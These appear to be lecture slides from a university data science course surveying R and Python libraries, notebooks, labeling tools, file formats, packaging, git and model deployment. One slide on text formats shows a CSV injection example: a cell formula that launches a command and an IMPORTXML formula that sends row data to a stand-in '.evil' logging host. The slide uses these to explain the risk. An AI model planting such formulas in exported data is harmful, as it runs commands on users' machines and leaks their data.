Advanced Analytics in Business [D0S07a] Big Data Platforms & Technologies [D0S06a] Data Science Tools Overview

In-memory analytics Python and Visualization The road to big data Notebooks and development environments Labeling File formats Packaging and versioning systems Model deployment

2 In-memory Analytics

3 https://mattturck.com/data2020/ 4 Many tools and vendors

For experimentation and model development: hyperparameter tuning, logging, autoML For visualization For labeling For data: Hadoop, Spark, streaming data, feature stores, cloud data warehouses, different storage formats For labeling For deployment: different environments, pipe lines For monitoring and maintenance

5 Heard about Hadoop? Spark? H2O?

Many vendors with their “big data and analytics” stack

Amazon “My data lake versus yours” Cloudera There’s always “roll your own” Datameer Open source, or walled garden? DataStax Support, features, speed of upgrades? Dell Oracle The situation has stabilized a bit (i.e. the IBM champions have settled), but does it matter? MapR Pentaho Databricks Microsoft Hortonworks EMC2 6 Two sides emerge

Infrastructure

Big Data Integration Architecture NoSQL and NewSQL Streaming AI and ML ops

7 Two sides emerge

Analytics

Data Science Machine Learning AI NLP But also still: BI and Visualization

8 There’s a difference

9 In-memory analytics

Your data set fits in memory The assumption of many tools SAS, SPSS, MatLAB R, Python, Julia Is this really a problem? Servers with 512GB of RAM have become relatively cheap Cheaper than a HDFS cluster (especially in today’s cloud environment) Implementation makes a difference (representation of data set in memory) If your task is unsupervised or supervised modeling, you can apply sampling Some algorithms can work in online / batch mode

10 Python and R

11 The big two

The “big two” in modern data science: Python and R Both have their advantages Others are interesting too (e.g. Julia), but still less adopted Vendors such as SAS and SPSS remain as well But bleeding-edge algorithms or techniques found in open-source first Not (really) due to the language itself The language is just an interface Thanks to their huge ecosystem: many packages for data science available “Python is the second best language for everything” Add-on packages/libraries, which typically aim to: Work with higher order arrays (tensors) and apply operations (typically with broadcasting support) Inspired by early array languages such as Ada, APL, FORTRAN, … This then typically forms the basis to provide support for data frames and “wrangling” them E.g. a 2-dimensional matrix where each column can have a different type, together with sort/filter/aggregation functions Which is then used to construct feature matrices to perform un/supervised learning on Using the predictive techniques we’ve seen earlier As well as some techniques to plot and visualize results

12 Analytics with R

Native concept of a “data frame”: a table in which each column contains measurements on one variable, and each row contains one case Unlike a matrix, the data you store in the columns of a data frame can be of various types I.e., one column might be a numeric variable, another might be a factor, and a third might be a character variable. All columns have to be the same length (contain the same number of data items, although some of those data items may be missing values)

Fun read: Is a Dataframe Just a Table?, Yifan Wu, 2019 13 Analytics with R

Hadley Wickham Chief Scientist at RStudio, and an Adjunct Professor of Statistics at the University of Auckland, Stanford University, and Rice University Data Science “” ggplot2 for visualizing data

for manipulating data

tidyr for tidying data

stringr for working with strings

lubridate for working with date/times https://www.tidyverse.org/ Data Import readr for reading .csv and fwf files

readxl for reading .xls and .xlsx files

haven for SAS, SPSS, and files (also: foreign package)

httr for talking to web APIs

rvest for scraping websites

xml2 for importing XML files 14 Modern R

Learning R today? Make sure to use “modern R” principles

tidyverse should be the first package you install

Especially thanks to dplyr , tidyr , stringr , and lubridate

dplyr implements a verb-based data manipulation language Works on normal data frames but can also work with database connections (already a simple way to solve the mid-to-big sized data issue) Verbs can be piped together, similar to a Unix pipe operator

flights %>% select(year, month, day) %>% arrange(desc(year)) %>% head

15 Modern R

delay <- flights %>% group_by(tailnum) %>% summarise(count = n(), dist = mean(distance, na.rm = TRUE), delay = mean(arr_delay, na.rm = TRUE))

delay %>% filter(count > 20, dist < 2000) %>% ggplot(aes(dist, delay)) + geom_point(aes(size = count), alpha = 1/2) + geom_smooth() + scale_size_area()

Also see: https://www.rstudio.com/resources/cheatsheets/

16 Modeling with R

Virtually any unsupervised or supervised algorithm is implemented in R as a package The caret package (short for Classification And REgression Training) is a set of functions that attempt to streamline the process for creating predictive models. The package contains tools for: Data splitting Pre-processing Feature selection Model tuning using resampling Variable importance estimation Caret depends on other packages to do the actual modeling, and wraps these to offer a unified interface You can just use the original package as well if you know what you want Still widely used

17 Modeling with R

require(caret) require(ggplot2) require(randomForest)

training <- read.csv("train.csv", na.strings=c("NA","")) test <- read.csv("test.csv", na.strings=c("NA",""))

# Invoke caret with random forest and 5-fold cross validation rf_model <- train(TARGET~., data=training, method="rf", trControl=trainControl(method="cv",number=5), ntree=500) # Other parameters can be passed here

print(rf_model)

## Random Forest ## ## 5889 samples ## 53 predictors ## 5 classes: 'A', 'B', 'C', 'D', 'E' ## ## Resampling: Cross-Validated (5 fold) ## ## Summary of sample sizes: 4711, 4712, 4710, 4711, 4712 ## ## Resampling results across tuning parameters: ## mtry Accuracy Kappa Accuracy SD Kappa SD ## 2 1 1 0.006 0.008 ## 27 1 1 0.005 0.006 ## 53 1 1 0.006 0.007 ## ## Accuracy was used to select the optimal model using the largest value. ## The final value used for the model was mtry = 27. 18 Modeling with R

print(rf_model$finalModel)

## Call: ## randomForest(x = x, y = y, mtry = param$mtry, proximity = TRUE, ## allowParallel = TRUE) ## Type of random forest: classification ## Number of trees: 500 ## No. of variables tried at each split: 27 ## ## OOB estimate of error rate: 0.88% ## ## Confusion matrix: ## A B C D E class.error ## A 1674 0 0 0 0 0.00000 ## B 11 1119 9 1 0 0.01842 ## C 0 11 1015 1 0 0.01168 ## D 0 2 10 952 1 0.01347 ## E 0 1 0 5 1077 0.00554

19 Modeling with R

The mlr package is an alternative to caret

R does not define a standardized interface for all its machine learning algorithms The mlr package provides infrastructure so that you can focus on your experiments The framework provides supervised methods like classification, regression and survival analysis along with their corresponding evaluation and optimization methods, as well as unsupervised methods like clustering The package is connected to the OpenML and its online platform, which aims at supporting collaborative machine learning online and allows to easily share datasets as well as machine learning tasks, algorithms and experiments in order to support reproducible research mlr3 : https://mlr3.mlr-org.com/

Newer, though gaining uptake

20 Modeling with R

library(mlr3) set.seed(1)

task_iris = TaskClassif$new(id = "iris", backend = iris, target = "Species")

learner = lrn("classif.rpart", cp = 0.01)

train_set = sample(task_iris$nrow, 0.8 * task_iris$nrow) test_set = setdiff(seq_len(task_iris$nrow), train_set)

# train the model learner$train(task_iris, row_ids = train_set)

# predict data prediction = learner$predict(task_iris, row_ids = test_set)

# calculate performance prediction$confusion

## truth ## response setosa versicolor virginica ## setosa 11 0 0 ## versicolor 0 12 1 ## virginica 0 0 6

measure = msr("classif.acc") prediction$score(measure)

## classif.acc ## 0.9666667 21 Modeling with R

The modelr package provides functions that help you create elegant pipelines when modelling

By Mainly for simple regression models

More information: http://r4ds.had.co.nz/

Modern R approach Starts simple – linear and visual models Good introduction

22 Visualizations with R

ggplot2 reigns supreme By Hadley Wickham Uses a “grammar of graphics” approach A grammar of graphics is a tool that enables us to concisely describe the components of a graphic An abstraction which makes thinking, reasoning and communicating graphics easier Such a grammar allows us to move beyond named graphics (e.g., the “scatterplot”) and gain insight into the deep structure that underlies statistical graphics Original idea: Wilkinson (2006) ggvis : based on ggplot2 and built on top of vega (a visualization grammar, a declarative format for creating, saving, and sharing interactive visualization designs) Also declaratively describes data graphics Different render targets Interactivity: interact in browser, phone, …

23 Visualizations with R shiny : a web application framework for R

Construct interactive dashboards

24 Other packages worth noting

janitor : tools for cleaning data stringr : work with text

lubridate : work with times and dates

ROCR : make ROC and other curves (or verification , or pROC , or mltools )

MICE : handle missing data (or naniar )

ROSE : up/down sampling with SMOTE forecast : time series analysis (or prophet )

leaflet : make maps

igraph : social network analysis

esquisse : drag and drop ggplot2 plot builder (Tableau-style, https://dreamrs.github.io/esquisse/) assertr : assertions on data

25 Analytics with Python

Python itself is not a statistical / scientific language

SciPy is a Python-based ecosystem of open-source software for mathematics, science, and engineering

NumPy is the fundamental package for scientific computing with Python A powerful N-dimensional array object, sophisticated (broadcasting) functions, tools for integrating C/C++ and Fortran code, useful linear algebra, … “Let’s make Python’s arrays fast” is an open source, BSD-licensed library providing high-performance, easy-to-use data structures and data analysis tools for the Python programming language Python’s “data frame”, uses NumPy matplotlib : comprehensive 2d plotting SciPy library: fundamental library for scientific computing

26 Analytics with Python

“ When operating on two arrays, NumPy compares their shapes element-wise. It starts with the trailing dimensions, and works its way forward. Two dimensions are compatible when they are equal, or one of them is 1. Arrays do not need to have the same number of dimensions, they’re lined up in a trailing fashion. When either of the dimensions compared is one, the other is used. In other words, dimensions with size 1 are stretched or “copied” to match the other.

– https://docs.scipy.org/doc/numpy/user/basics.broadcasting.html “

Image (3d array): 256 x 256 x 3 * Scale (1d array): (1) x (1) x 3 = Result (3d array): 256 x 256 x 3

A (4d array): 8 x 1 x 6 x 1 * B (3d array): (1) x 7 x 1 x 5 = Result (4d array): 8 x 7 x 6 x 5

Learning solid Numpy indexing and broadcasting is a superpower

27 Analytics with Python

import pandas as pd import numpy as np

df.sort_values(by='B')

A B C D 2013-01-03 -0.861849 -2.104569 -0.494929 1.071804 2013-01-04 0.721555 -0.706771 -1.039575 0.271860 2013-01-01 0.469112 -0.282863 -1.509059 -1.135632 2013-01-02 1.212112 -0.173215 0.119209 -1.044236 2013-01-06 -0.673690 0.113648 -1.478427 0.524988 2013-01-05 -0.424972 0.567020 0.276232 -1.087401

28 Analytics with Python

NumPy itself is clean and very well documented…

Pandas’ API is a bit of a mess

“Minimally Sufficient Pandas”: https://medium.com/dunder-data/minimally-sufficient-pandas-a8e67f2a2428

E.g. on the different ways to index: .loc is primarily label based ( dataframe.loc['a'] ), but may also be used with a boolean array

.loc will raise KeyError when the items are not found

.iloc is primarily integer position based (from 0 to length-1 of the axis)

.ix supports mixed integer and label based access

Similarly to .loc , .at provides label based scalar lookups, while, .iat provides integer based lookups analogously to .iloc

Oh, and you can still do dataframe.a or dataframe['a']

If df is a sufficiently long DataFrame, then df[1:2] gives the second row, however, df[1] gives an error and df[[1]] gives the second column

There are packages like dplython and pandas-ply , though not widely used Pandas does have strong time-series operators, however Situation is a bit better since https://pandas.pydata.org/docs/whatsnew/v1.0.0.html 29 Modeling with Python

Modeling offers a better picture

scikit-learn Simple and efficient tools for data mining and data analysis Accessible to everybody, and reusable in various contexts Built on NumPy, SciPy, and matplotlib Open source, commercially usable - BSD license Lots of algorithms implemented Relatively easy to implement your own algorithms statsmodels Python library that provides classes and functions for the estimation of many different statistical models, as well as for conducting statistical tests, and statistical data exploration

30 Modeling with Python

from sklearn.datasets import load_iris from sklearn.ensemble import RandomForestClassifier import pandas as pd import numpy as np

iris = load_iris() df = pd.DataFrame(iris.data, columns=iris.feature_names) df['is_train'] = np.random.uniform(0, 1, len(df)) <= .75 df['species'] = pd.Factor(iris.target, iris.target_names)

train, test = df[df['is_train'] == True], df[df['is_train'] == False]

features = df.columns[:4] clf = RandomForestClassifier(n_jobs=2) y, _ = pd.factorize(train['species']) clf.fit(train[features], y)

preds = iris.target_names[clf.predict(test[features])] pd.crosstab(test['species'], preds, rownames=['actual'], colnames=['preds'])

31 Modeling with Python

For some things you’ll have to look elsewhere

scikit-learn tries to provide a unified API for the basic tasks in machine learning, with “ “ pipelines and meta-algorithms like grid search to tie everything together

pystruct handles general structured learning

seqlearn handles sequence based learning

surprise or lightfm for recommender engines

statsmodels or prophet for time series

“ Deep learning and reinforcement learning both require a rich vocabulary to define an architecture, with deep learning additionally requiring GPUs for efficient computing. However,

neither of these fit within the design constraints of scikit-learn “

Basic CPU-based artificial neural networks are present, however Some support to work with textual data though – i.e. many featurization options 32 Visualizations with Python

matplotlib : the foundation seaborn : “if matplotlib ‘tries to make easy things easy and hard things possible,’ seaborn tries to make a well-defined set of hard things easy too” ggplot : Python implementation of ggplot2. Not a “feature-for- feature port of ggplot2,” but there’s strong feature overlap Altair : newer library with “pleasant API”

bokey : similar

yellowbrick Datashader : for massive amounts of data points

Older but fun comparison at: https://dansaber.wordpress.com/2016/10/02/a- dramatic-tour-through-pythons-data-visualization-landscape-including- ggplot-and-altair/

33 Other packages worth noting

imbalanced-learn : up/down sampling with SMOTE and friends

plotnine : another ggplot -style Python plotting tool

tqdm : human friendly progress bars missingno : handle missing data

dateparser : handling dates in various formats

pyflux : time series analysis (or prophet , or tsfresh )

great_expectations : assertions on data

folium : mapping library scikit.ml : multilabel techniques

pomegranate : probabilistic models

semisup-learn : semi-supervised models

And there are interops packages to work between R and Python as well (e.g. reticulate )

34 Visualization

35 Packaged software and BI

Apart from the libraries mentioned above, there’s also packaged (“business intelligence” software)

E.g. Tableau, Spotfire, PowerBI, Cognos, Qlikview, SAS Visual Analytics, … Just “use” the tool, no hastle of coding and debugging Ease-of-use Limited in functionality Custom design more difficult Has virtually nothing to do with modeling

36 Packaged software and BI

Niche visualization can require niche tools, though

Web analytics (Google, Adobe, SAS) E.g. process mining: (Disco and friends) Graph visualizations: Gephi, NodeXL, sigma.js, Cytoscape Mapping (Leaflet, Folium, kepler.gl, others)

37 Further libraries to be aware of

d3.js : Javascript-library which made famous the concept of “data-driven” documents D3 allows you to bind arbitrary data to a Document Object Model (DOM), and then apply data-driven transformations to the document For example, you can use D3 to generate an HTML table from an array of numbers. Or, use the same data to create an interactive SVG bar chart with smooth transitions and interaction Direct coupling between data and visualization: changing the data changes the visualisation See: https://github.com/mbostock/d3/wiki/Gallery, http://bl.ocks.org/, http://bl.ocks.org/mbostock and https://bost.ocks.org/mike/

Graphviz: diagram and graph visualizations (serves as the “engine” in many other tools)

Plotly: widely used charting library, with Plotly Dash (https://plot.ly/products/dash/) as a great dashboarding tool for Python (great shiny alternative)

38 The Road to Big Data

39 On-GPU analytics

GPU: graphical processing unit

Efficient for massive parallelizable operations (e.g. linear algebra, vector operations) Ecosystem mainly based on Python Hardware support mainly based on NVIDIA GPU’s with CUDA SDK

Training data can be very large (a million images, for instance), but not necessarily stored or handled in a distributed fashion

“Epoch“: one iteration of training. For small data sets: exposing a learning algorithm to the entire set of training data (the “batch”) “Minibatch” means that the gradient is calculated across a sample before updating weights Can be done in-memory Computation can be distributed, however: often involves distribution over multiple GPUs, though these are separate approaches than Hadoop and friends, e.g. Apache mxnet – and often comes with bottlenecks when used in a networked fashion (so “distributed” often happens by using multiple GPU’s in one machine)

40 On-disk analytics

Even if your data set exceeds the boundaries of memory, there might be an easier way other than big-data oriented setups: the “intermediate” step before going full “big data”

Learn how to use your package correctly (e.g. apply methods instead of slow for loops!) Use a database and SQL Use a better memory representation (e.g. data.table in R) Memory-mapped files (i.e. “disk-scratching”) ff or bigmemory in R (but not that fun)

disk.frame : https://github.com/xiaodaigh/disk.frame

Dask in Python, similar API as pandas

Pandas on Ray (https://ray.readthedocs.io/en/latest/pandas_on_ray.html) is also popular, powerful when combined with modin (https://github.com/modin-project/modin) (“Modin is a DataFrame designed for datasets from 1KB to 1TB+”) vaex (https://github.com/vaexio/vaex) (works with huge tabular data, process more than a billion rows/second)

Dato (Turi) used to have a great implementation, now open source as Sframe (https://github.com/turi-code/SFrame) and in https://github.com/apple/turicreate

41 On-disk analytics

import pandas as pd import dask.dataframe as dd df = pd.read_csv('2015-01-01.csv') df = dd.read_csv('2015-*-*.csv') df.groupby(df.user_id).value.mean() df.groupby(df.user_id).value.mean().compute()

import graphlab import graphlab.aggregate as agg sf = graphlab.SFrame.read_csv('2018-01-01.csv') sf.groupby(key_columns='user_id', operations={'avg': agg.MEAN('value')})

Careful with this, though. You can end up with Pandas, Dask and Spark code in one spaghetti bowl

Nevertheless, most organizations that jumped on the Spark and co. bandwagon would have been better off taking a good look at the above

It could have been solved with a bunch of servers and a (distributed) on-disk library Funny how most of these libraries have adopted the directed acyclic graph (DAG) computing approach initially “rediscovered” by Spark as a way to forego MapReduce, something we’ll talk about later

“Pandas is crashing because I’m trying to work with a 50GB data set” is not really an excuse

42 Notebooks and Development Environments

43 Notebooks

Scientific programing in data science is very much concerned with exploration, experimentation, making demos, collaborating, and sharing results

It is this need for experiments, explorations, and collaborations that is addressed by notebooks for scientific computing Notebooks are collaborative web-based environments for data exploration and visualization Similar to a “lab notebook”

The idea of computer notebooks has been around for a long time, starting with the early days of MatLAB and Mathematica in the mid-to-late-80s

Later: SageMath and IPython Today: Jupyter

44 Notebooks

45 Notebooks

The Sage Notebook was released on 24 February 2005 by William Stein

Professor of mathematics at the University of Washington Free and open source software (GNU License), with the initial goal of creating an “open source alternative to Magma, , Mathematica, and MATLAB” Sage is based on Python and focuses on mathematical worksheets

The IPython console was started by Fernando Perez circa 2001

From a first attempt to replicate a Mathematica Notebook with 259 lines of code With the Sage Notebook being a reference, Perez had many collaborations with the Sage team

In 2015, the IPython Notebook project became the Jupyter project

The ability to go beyond Python and run several languages (“kernels”) in a notebook However, it is not possible to have multiple cells with multiple languages within the same notebook Impressive success and steady growth since 2011 46 Notebooks

47 Notebooks

Other alternatives:

Apache Zeppelin: similar in concept to Jupyter Apache Zeppelin is build on the JVM while Jupyter is built on Python Zeppelin offers the possibility to mix languages across cells Zeppelin is mainly oriented towards Spark Was originally implemented as they way forward by many Spark-based vendor stacks, though today, we see that Jupyter is the most popular environment, so that most stacks are, or have continued to, including Jupyter Beaker: designed from the start to be a fully polyglot notebook. Supports Python, Python3, R, Julia, JavaScript, SQL, Java, Clojure, HTML5, Node.js, C++, LaTeX, Ruby, Scala, Groovy, Kdb Nice idea of mixing languages in the same notebook, but has not really gone anywhere nteract: for those of you that like to have Jupyter installed as a desktop app Includes easier ways for styling observablehq.com The cool new kid on the block Heavily JS oriented See e.g. https://observablehq.com/@bmesuere

48 Notebooks

Jupyter comes with a lot of benefits

Quick iteration, immediate output shown in the notebook Easy to construct “dynamic” reports, by applying your style sheets You can even make them interactive (i.e. through the use of widgets, https://ipywidgets.readthedocs.io/en/latest/examples/Widget%20Basics.html) Many extensions to adjust your workflow “Jupyter Hub” to host a multi user Jupyter environment

E.g. Netflix uses papermill to directly execute and schedule Notebooks

papermill is a tool for parameterizing, executing, and analyzing Jupyter Notebooks https://medium.com/netflix-techblog/scheduling-notebooks-348e6c14cfd6 https://github.com/nteract/papermill

49 Notebooks

But come with a set of issues as well…

Version control can be problematic Jupyter stores notebooks as one big JSON file, including inputs and outputs Every time you make a change, need to commit the whole file Code can only be run block-by-block (cell by cell) Can easily mess up flow of code (non-linear execution) You end up with a notebook, which has newer results above the older results Code can end up looking fragmented People start splitting the chunks and forget to put them back together, lose track of the order of the analysis and it all ends up in a big mess Does not encourage to write modular code You end up copying code fragments from older, other people’s notebooks “Executing” a notebook can be difficult Reproducibility? Export to Python, R?

50 Notebooks https://docs.google.com/presentation/d/1n2RlMdmv1p25Xy5thJUhkKGvjtV-dkAIsUXP-AL4ffI/edit and https://yihui.name/en/2018/09/notebook-war/:

1. Hidden state and out-of-order execution 2. Notebooks are difficult for beginners 3. Notebooks encourage bad habits 4. Notebooks discourage modularity and testing 5. Jupyter’s autocomplete, linting, and way of looking up the help are awkward 6. Notebooks encourage bad processes 7. Notebooks hinder reproducible + extensible science 8. Notebooks make it hard to copy and paste into Slack/Github issues 9. Errors will always halt execution 10. Notebooks make it easy to teach poorly 11. Notebooks make it hard to teach well

51 Notebooks

https://colab.research.google.com

52 Notebooks

https://studio.azureml.net/

53 Notebooks

All cloud providers have realized that the best data science environment to offer is simply Python + Jupyter + the possibility to install packages

The issues can be solved:

Version control can be problematic Fixed in many hosted environments Possible to “roll your own”, e.g. through the use of “git hooks” Code can only be run block-by-block (cell by cell) Enforce strict guidelines Does not encourage to write modular code E.g. see https://github.com/fastai/nbdev “Executing” a notebook can be difficult Solution exist to overcome this as well, e.g. papermill fast.ai has written a whole book using Jupyter

The takeaway? Notebooks are here to stay

Great tool for exploration, experimentation, development phase of data science, even for showing results in “report” form But additional processes / skills / governance required If not: “throw it over the wall projects” E.g. end-product of data scientist should be a (collection) of notebooks which can, at any moment, (re)train the model, save and validate it Common code should be put in separate modules “I like notebooks”

54 IDEs

Integrated development environment

Commonly offers much better debugging, code inspection, documentation capabilities RStudio for R On desktop Or hosted on web server (commercial) Support for Git and others Authoring reports, slide shows Interactive visualizations Spyder for Python Copies look and feel of Rstudio Similar: Rodeo Or IDEs such as PyCharm Or Jupyter Lab Builds on top of Jupyter Adds panel layout, file view

55 IDEs

https://www.rstudio.com/

56 IDEs

https://www.jetbrains.com/pycharm/

57 IDEs

https://github.com/jupyterlab/jupyterlab 58 IDEs

https://code.visualstudio.com/ 59 Getting started

Python

Anaconda Distribution: https://www.continuum.io/downloads Includes Jupyter, Python, data science package repository (also for R)

R

CRAN (base installation): https://cran.r-project.org/ RStudio: https://www.rstudio.com/ Or Jupyter

Hosted (“one click Jupyter”)

Google Colab: https://colab.research.google.com (free) Azure ML Studio: https://studio.azureml.net/ (free) Kaggle Kernels: https://www.kaggle.com/kernels (free) http://paperspace.io/ and https://gradient.paperspace.com/ https://www.floydhub.com/ https://www.crestle.com/ https://www.onepanel.io/ https://www.easyaiforum.cn/ (易学智能) SageMaker, or AWS Google Compute Platform, EC2, Digitalocean… and install yourself

60 Labeling

61 Labeling

Not so easy in real life…

62 Labeling

https://github.com/CrowdCurio/time-series-annotator 63 Labeling

https://github.com/SkalskiP/make-sense

64 Labeling

https://github.com/Labelbox/Labelbox 65 Labeling

https://github.com/NaturalIntelligence/imglab 66 Labeling

For different data types and tasks Manual labelers can be hired as well See https://github.com/heartexlabs/awesome-data-labeling for a good overview Good tools will utilize active learning approaches to speed up the labeling Label some images Train a model Next, ask to label some images for which the model is unsure Other approaches use a pretrained model to speed up the labeling

67 Labeling

https://github.com/koaning/human-learn 68 Labeling

“ Absolutely brilliant. Ever since taking ML classes in MSc and then again in PhD I have wondered why no machine learning approach ever applies such an obvious technique. And most real world datasets are probably adequately addressed with this approach, and everyone regardless of technical background can understand it. ML no longer has to be an inscrutable black box mystery.

As for the “let’s just draw the model” idea, it gets complicated as soon as you’re dealing with more than one input parameter. The author has some workarounds, it looks like.

Being able to project the data into a latent space where classes can be separated is what makes modern ML so valuable.

I don’t understand why this approach is valuable. If you can label your examples using traditional software, why would you build a model? Why not just use the label function in

whatever context you intended the model to exist? “ 69 Labeling

Snorkel Flow: https://snorkel.ai/platform/ Snorkel: https://github.com/snorkel-team/snorkel Snorkel: Rapid Training Data Creation with Weak Supervision: https://arxiv.org/abs/1711.10160

“ Humans provide accidental regularization - and a human made decision boundary can have further fine- tuning by an expert. Even better if you have a generative model which can “hallucinate” parts of the decision boundary which don’t have points. Now you can “probe” your model and have a human intervene if they think parts of the decision

boundary are wrong. “

70 Labeling

Also see:

FlyingSquid: https://github.com/HazyResearch/flyingsquid Alteryx Compose: https://github.com/alteryx/compose

71 File Formats

72 In which format do we store our data?

You might be used to text-based formats (CSV and friends, or Excel), but there are various concerns at play here:

How fast is it to serialize data (write)? How fast can it be read in? How large is it? Column or row based? Easy to distribute? Easy to modify schema?

73 Text based formats

CSV, TSV, JSON, XML Convenient to exchange with other applications or scripts Human readable Bulky and not efficient to query without reading whole structure in memory first Hard to infer schema Compression applies on file-level Still one of the most common formats

74 Text based formats

UserId,BillToDate,ProjectName,Description,DurationMinutes 1,2017-07-25,Test Project,Flipped the jibbet,60 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240 2,2017-07-25,Important Client,"=2+5+cmd|' /C calc'!A0", 240

UserId,BillToDate,ProjectName,Description,DurationMinutes 1,2017-07-25,Test Project,Flipped the jibbet,60 2,2017-07-25,Important Client,"Bop, dop, and giglip", 240 2,2017-07-25,Important Client, "=IMPORTXML(CONCAT(""http://some-server-with-log.evil?v="", CONCATENATE(A2:E2)), ""//a"")", 240 http://georgemauer.net/2017/10/07/csv-injection.html

75 Text based formats

76 Sequence files

A persistent data structure for binary key-value pairs “Serialized Java objects” Row-based Commonly used to transfer data in map-reduce jobs (see later) Compression applies on row level Less popular in recent years, not portable

77 Optimized Row Columnar (ORC)

Evolution of the older RCFile Stores collections of rows and within the collection the data is stored in columnar format (combination of row- and column-based) Lightweight indexing Splittable Less popular in recent years

78

Widely used as serialization format Row-based, compact binary format Schema is included in the file Supports schema evolution Add, rename and delete columns Compression on record level https://blog.cloudera.com/blog/2009/11/avro-a-new-format-for-data-interchange/

79

Column-oriented binary file format Efficient when specific columns are queried Common in data science Parquet is built to support very efficient compression and encoding schemes Parquet allows compression schemes to be specified on a per-column level Good support for schema evolution Can add columns at the end

80 SQLite files

Row-oriented file stores Support for multiple tables, schema evolution, SQL querying Integrates nicely with many languages Data sets can become very large

81 HDF5

HDF5 is a data model, library, and file format for storing and managing data Supports an unlimited variety of datatypes, and is designed for flexible and efficient I/O and for high volume and complex data HDF5 is portable and is extensible, allowing applications to evolve in their use of HDF5 A file system within a file Specification is very complex

82 Kudo

Kudu is a storage system for tables of structured data Tables have a well-defined schema consisting of a predefined number of typed columns. Each table has a primary key composed of one or more of its columns Kudu tables are composed of a series of logical subsets of data, similar to partitions in relational database systems, called Tablets Kudu provides data durability and protection against hardware failure by replicating these Tablets to multiple commodity hardware nodes

83 Apache Arrow

Engineers from across the community established Arrow as a de-facto standard for columnar in- memory processing and interchange The layout is highly cache-efficient in analytics workloads Not a binary file specification, but a memory representation specification Efficient and fast data interchange between systems without the serialization costs associated with other systems like Thrift, Avro, and Protocol Buffers A flexible structured data model supporting complex types that handles flat tables as well as real-world JSON-like data engineering workloads

84 Feather

A Fast On-Disk Format for Data Frames for R and Python, powered by Apache Arrow

“ “One thing that struck us was that while R’s data frames and Python’s pandas data frames utilize very different internal memory representations, they share a very similar semantic model”. In discussing Apache Arrow in the context of Python and R, we wanted to see if we could use the insights from feather to design a very fast file format for storing data frames that

could be used by both languages. “

Feather is a fast, lightweight, and easy-to-use binary file format for storing data frames

Lightweight, minimal API: make pushing data frames in and out of memory as simple as possible Language agnostic: Feather files are the same whether written by Python or R code. Other languages can read and write Feather files, too High read and write performance. When possible, Feather operations should be bound by local disk performance

85 Feather

library(feather) path <- "my_data.feather" write_feather(df, path) df <- read_feather(path) # Analogously, in Python, we have: import feather path = 'my_data.feather' feather.write_dataframe(df, path) df = feather.read_dataframe(path)

86 What to take away from this?

Be prepared to deal with different data sources

AVRO is fast to serialize (write, dump) data and supports schema evolution: great choice for ETL and integration Parquet and Feather are fast to read, query, and analyse data Feather currently a popular choice for data science

Future: Arrow/Feather + Parquet

Feather is not designed for long-term data storage. At this time, we do not guarantee that the file format will be stable between versions Instead, use Feather for quickly exchanging data between Python and R code, or for short-term storage of data frames as part of some analysis Feather is extremely fast. Since Feather does not currently use any compression internally, it works best when used with solid-state drives as come with most of today’s laptop computers Many organisations are adopting a hybrid approach

87 Packaging and Versioning Systems

88 Packaging

You’ll commonly encounter “package managers” when working in your preferred ecosystem

“ A package manager or package management system is a collection of software tools that automates the process of installing, upgrading, configuring, and removing computer programs

for a computer’s operating system in a consistent manner. “

Management of installs and updates Avoiding conflicts Resolving dependencies

89 Virtual environments

This is commonly combined with a way to set up “virtual environments”: isolated subsystems, each with their own collection packages

The idea is to make your environment reproducible Avoids the “runs on my computer” syndrome

90 In Python and R

R comes with each own package management system, allows to download packages from a repository E.g. install.packages(...)

Virtual environments can be set up using packrat

Python has had a lot of package managers, but the most common one nowadays is pip Included with Python 3 by default Included with the Anaconda distribution E.g. pip install numpy

Virtual environments can be set up using virtualenv

Or you can use conda : Anaconda’s package manager and virtual environment manager in-one Includes more than just Python packages, also R and other tools are included Hence also allows to set up clean isolated R workspaces Good rule of thumb: a new conda environment for each project https://conda.io/projects/conda/en/latest/user-guide/getting-started.html https://docs.conda.io/projects/conda/en/4.6.0/_downloads/52a95608c49671267e40c689e0bc00ca/conda-cheatsheet.pdf To isolate a complete environment, virtualization and containerization tools like docker are commonly used as well

91 Versioning systems

Something else to read up on is the use of version control systems

“ Version control systems are a category of software tools that help a software team manage changes to source code over time. Version control software keeps track of every modification to the code in a special kind of database. If a mistake is made, developers can turn back the clock and compare earlier versions of the code to help fix the mistake while minimizing

disruption to all team members. “

Even a good idea to use this for a “team of one” SVN, CSV, Mercurial, Bazaar Most common one is git

92 git

“ Git was created by Linus Torvalds in 2005 for development of the Linux kernel, with other kernel developers contributing to its initial development.

As with most other distributed version-control systems, and unlike most client–server systems, every Git directory on every computer is a full-fledged repository with complete history and full version-tracking abilities, independent of network access or a central server.

Git is free and open-source software distributed under the terms of the GNU General Public

License version 2. “

GitHub: hosts git repositories for you (free) GitLab: an alternative

93 git

GitHub Desktop

94 git

A good way to practice is to put your coding, data science projects, blog even on GitHub

E.g. feel free to try this for an assignment

Many data science recruiters will look at your GitHub profile to see the (personal) projects you’ve worked and collaborated on

95 Model Deployment

96 Context

Recall from the evaluation session that evaluation doesn’t stop at deployment

Sculley, D., Holt, G., Golovin, D., Davydov, E., Phillips, T., Ebner, D., … & Dennison, D. (2015). Hidden technical debt in machine learning systems. In Advances in neural information processing systems (pp. 2503-2511) In real-world machine learning systems, only a small fraction is comprised of actual ML code There is a vast array of surrounding infrastructure and processes to support their evolution Many sources of technical debt can accumulate in such systems, some of which are related to data dependencies, model complexity, reproducibility, testing, monitoring, and dealing with changes in the external world

97 Context

A simple straight-through process?

98 Common deployment issues

Lineage of data dependencies

Metadata management Ensuring that data is available to the model at prediction-time This include all pre-processing steps that are applied to the data! Different data sources, one-off data sources used during training Common deployment issues

Deployment context

Will the model be deployed as an API, embedded in a web app, a mobile app, scheduled to run every week, month…? Differences between data science development environment (Jupyter, Anaconda, R…) and I.T. environment (Java, .NET, …) How to keep model changes in sync with application changes?

100 Common deployment issues

Development governance

Is the training code well-documented? How is collaboration, versioning handled? Can the training code be easily reproduced, e.g. to re-train the model periodically? “Runs on my machine phenomenon”

101 Common deployment issues

Model governance

How is the model deployed? A common platform, using containerization or virtualization, ad-hoc? Is versioning support provided for models? Models as data: can output of one model be easily used in other models/projects? Is lineage kept? Is metadata available (e.g. when was the model last updated?)

102 Common deployment issues

Monitoring

Inputs, outputs, and usage! Do we know when the input data is changing, when the output probability changes? Are errors reported and logged?

103 Common deployment issues

Many of these issues are well known in traditional software engineering

Testing, monitoring, logging, structured development processes Continuous development, integration, deployment (CI/CD)

In the context of ML productionization, many of these are hard to apply

